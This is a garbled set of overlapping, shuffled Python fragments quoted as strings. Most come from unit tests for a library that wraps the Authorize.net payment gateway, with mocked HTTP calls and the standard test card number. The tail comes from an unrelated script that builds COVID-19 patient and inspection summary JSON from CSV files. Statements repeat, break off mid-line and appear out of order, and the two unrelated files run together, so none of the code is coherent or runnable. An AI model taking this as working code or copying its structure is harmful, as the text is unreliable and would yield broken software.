self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'", "'1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'],", "urlopen): urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import", "str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect", "str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success", "def test_capture(self, urlopen): urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card,", "return s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1, _params2 =", "def test_make_call(self, urlopen): urlopen.side_effect = self.success params = {'a': '1',", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success result = self.api.auth(20,", "from datetime import date from six import BytesIO, binary_type, u", "SUCCESS.seek(0) or SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0) or", "( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test", "params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num':", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') 
self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a':", "def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api =", "'911', 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip':", "mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import", "'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen):", "'CA', '90291') def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL)", "TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url,", "'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has been", "self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' ))", "urlopen.side_effect = self.success # Test without specified amount result =", "= self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC'", "'4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city':", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen')", "transaction_id, amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45 Rose Ave', 'Venice',", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success result =", "self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq(", "try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith(", "'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has", "Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return None", "'1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text':", "def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b':", "}) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, {", "ERROR self.year = date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year,", "urlencode(params) )) self.assertEqual(result, 
PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect =", "'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This transaction has been", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success #", "( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This", "'x_zip': '90291', 'x_country': 'US', }) params = self.api._add_params( {}, credit_card=self.credit_card,", "'&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect =", "with specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only',", "isinstance(s, binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1,", "'20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction", "getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return None def get_content_charset(self,", "credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', })", "__init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS", "b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2',", "= self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "'90291') def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api", "= TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False)", "}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success result =", "with transaction_id, amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "} def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return s", "'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2',", "{ 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params =", "'x_exp_date': '01-{0}'.format(self.year), 
'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city': 'Venice',", "def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return s def", "specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape')", "version\"\"\" return None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3", "class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2", "urlopen.side_effect = self.success params = {'a': '1', 'b': '2'} result", "urlopen): urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0],", "MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;'", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success # Test", "'Venice', 'CA', '90291') def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url,", ") )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect =", "PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount':", "'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response':", "urlopen.side_effect = self.success # Test with transaction_id, amount result =", "map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def", "urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect", "'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1',", "'response_reason_code': '1', 'response_reason_text': 'This transaction has been approved.', 'transaction_id': '2171062816',", "self.year, 1, '911') self.address = Address('45 Rose Ave', 'Venice', 'CA',", "{ 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip':", "import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class", "'This transaction has been approved.', 'transaction_id': '2171062816', } ERROR =", "date from six import BytesIO, binary_type, u from six.moves.urllib.parse import", "params2): _params1, _params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) ==", "# Test without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose 
Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = {", "'1', 'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction", "2 version\"\"\" return None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success result =", "'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y',", "'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success #", "**kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0)", "TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect", "urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b': '2'}) except", "self.api = TransactionAPI('123', '456') self.success = lambda *args, **kwargs: SUCCESS.seek(0)", "IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self,", "test_capture(self, urlopen): urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card, self.address)", "'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self,", "= self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' ))", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success # Test", "authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard", "'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has been", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1',", "amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "'1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result,", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = 
self.success params = {'a':", "test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num':", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success", "self.error try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as e:", "'response_reason_code': '2', 'response_reason_text': 'This transaction has been declined.', 'transaction_id': '2171062816',", "test_auth(self, urlopen): urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card, self.address)", "'&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect =", "self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date':", "declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params =", "= IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "'911') self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291') def", "( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard from", "'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has been approved.',", "self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen):", "credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code':", "test_credit(self, urlopen): urlopen.side_effect = self.success # Test with transaction_id, amount", "Test with specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "transaction has been declined.' 
)) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}),", "def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers()", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result,", "'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen):", "PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount':", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success", "'x_country': 'US', }) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address )", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success result", "= self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response':", "PARSED_SUCCESS) # Test with specified amount result = self.api.settle('123456', amount=10)", "self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;'", "import TestCase import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI", "'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has been approved.', 'transaction_id':", "= MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;'", "declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response':", "'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This", "unittest2 import TestCase import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL,", "'&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount", "urlopen): urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0],", "10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 
'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' ))", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success result = self.api.capture(20,", "def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1',", "self.assertTrue(str(e).startswith( 'This transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def", "transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = {", "'2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text':", "self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID'", "== frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456')", "b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code':", "+ 10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address =", "return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api =", "'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N',", "'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params,", "{ 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type':", "u from six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import TestCase", "= self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111',", "_params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success", "= self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE'", "( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result,", "3 version\"\"\" return failobj def __init__(self, *args, 
**kwargs): BytesIO.__init__(self, *args,", "class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456') self.success =", "def test_settle(self, urlopen): urlopen.side_effect = self.success # Test without specified", "'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) params = self.api._add_params(", "result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result,", "datetime import date from six import BytesIO, binary_type, u from", "'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has", "'90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect =", "'456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL)", "= self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city':", "'456') self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error", "class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return", "Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api = TransactionAPI('123',", "self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error =", "\"\"\"Python 2 version\"\"\" return None def get_content_charset(self, failobj=None, *args, **kwargs):", "MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS", "specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45 Rose", "TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b':", "has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {})", "'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) params" ]
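# --- Usage sketch (not part of the original suite) ---------------------------
# A minimal sketch for running the tests above directly; any
# unittest-compatible runner would also discover this module.
if __name__ == '__main__':
    import unittest2
    unittest2.main()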
[ "# 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt =", "'%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 #", "inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) }", "datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt -", "open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row", "datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日", "1 datelist = [] for i in range(days_num): datelist.append(strdt +", "# 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as", "foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\":", "datelist.append(strdt + timedelta(days = i)) patients_summary_list = [] # 日付の新しい順に辿って小計が", "patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] #", "%H:%M') patients_list = [] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意", "in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue", "= [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader =", "開始日 enddt = 